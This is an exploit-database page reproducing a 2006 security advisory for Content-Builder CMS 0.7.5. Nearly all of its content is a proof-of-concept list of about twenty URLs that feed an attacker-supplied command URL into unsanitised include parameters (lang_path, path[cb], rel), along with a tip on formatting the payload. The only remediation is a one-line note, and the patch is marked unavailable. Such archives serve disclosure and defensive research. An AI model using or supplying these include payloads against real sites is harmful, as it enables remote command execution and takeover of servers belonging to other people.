[] NeoSense
E X P L O I T S
title author type platform port cve id

Content-Builder (CMS) 0.7.5 - Multiple Include Vulnerabilities

Author: Federico Fazzi
type: webapps
platform: php
port: 
date_added: 2006-06-10 
date_updated:  
verified: 1 
codes: OSVDB-26363;CVE-2006-3172;OSVDB-26362;OSVDB-26361;OSVDB-26359;OSVDB-26357;OSVDB-26356;OSVDB-26355;OSVDB-26354;OSVDB-26353;OSVDB-26352;OSVDB-26351;OSVDB-26350;OSVDB-26349;OSVDB-26348;OSVDB-26347;OSVDB-26346;OSVDB-26345;OSVDB-26344 
tags: 
aliases:  
screenshot_url:  
application_url: 
-----------------------------------------------------
Advisory id: FSA:012

Author:    Federico Fazzi
Date:      11/06/2006, 22:30
Sinthesis: Content-Builder (CMS) 0.7.5, Remote command execution
Type:      high
Product:   http://www.content-builder.de/
Patch:     unavailable
-----------------------------------------------------


1) Description:

vulnerables page:

Multiple vulnerabilities, see poc.

2) Proof of concept:

http://example/[cb_path]/cms/plugins/col_man/column.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/poll/poll.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/user_managment/usrPortrait.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/user_managment/user.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/media_manager/media.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/events/permanent.eventMonth.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/events/events.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/cms/plugins/newsletter2/newsletter.inc.php?lang_path=[cmd_url]/
http://example/[cb_path]/modules/guestbook/guestbook.inc.php?path[cb]=[cmd_url]/
http://example/[cb_path]/modules/shoutbox/shoutBox.php?path[cb]=[cmd_url]/
http://example/[cb_path]/modules/download/overview.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/download/detailView.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/sitemap/sitemap.inc.php?path[cb]=[cmd_url]/
http://example/[cb_path]/modules/article/fullarticle.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article/comments.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article2/overview.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article2/fullarticle.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/article2/comments.inc.php?rel=[cmd_url]/
http://example/[cb_path]/modules/headline/headlineBox.php?rel=[cmd_url]/
http://example/[cb_path]/modules/headline/showHeadline.inc.php?rel=[cmd_url]/

(note: add a cmd url with final slash (/))

3) Solution:

sanitized all variables on all files.

# milw0rm.com [2006-06-11]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.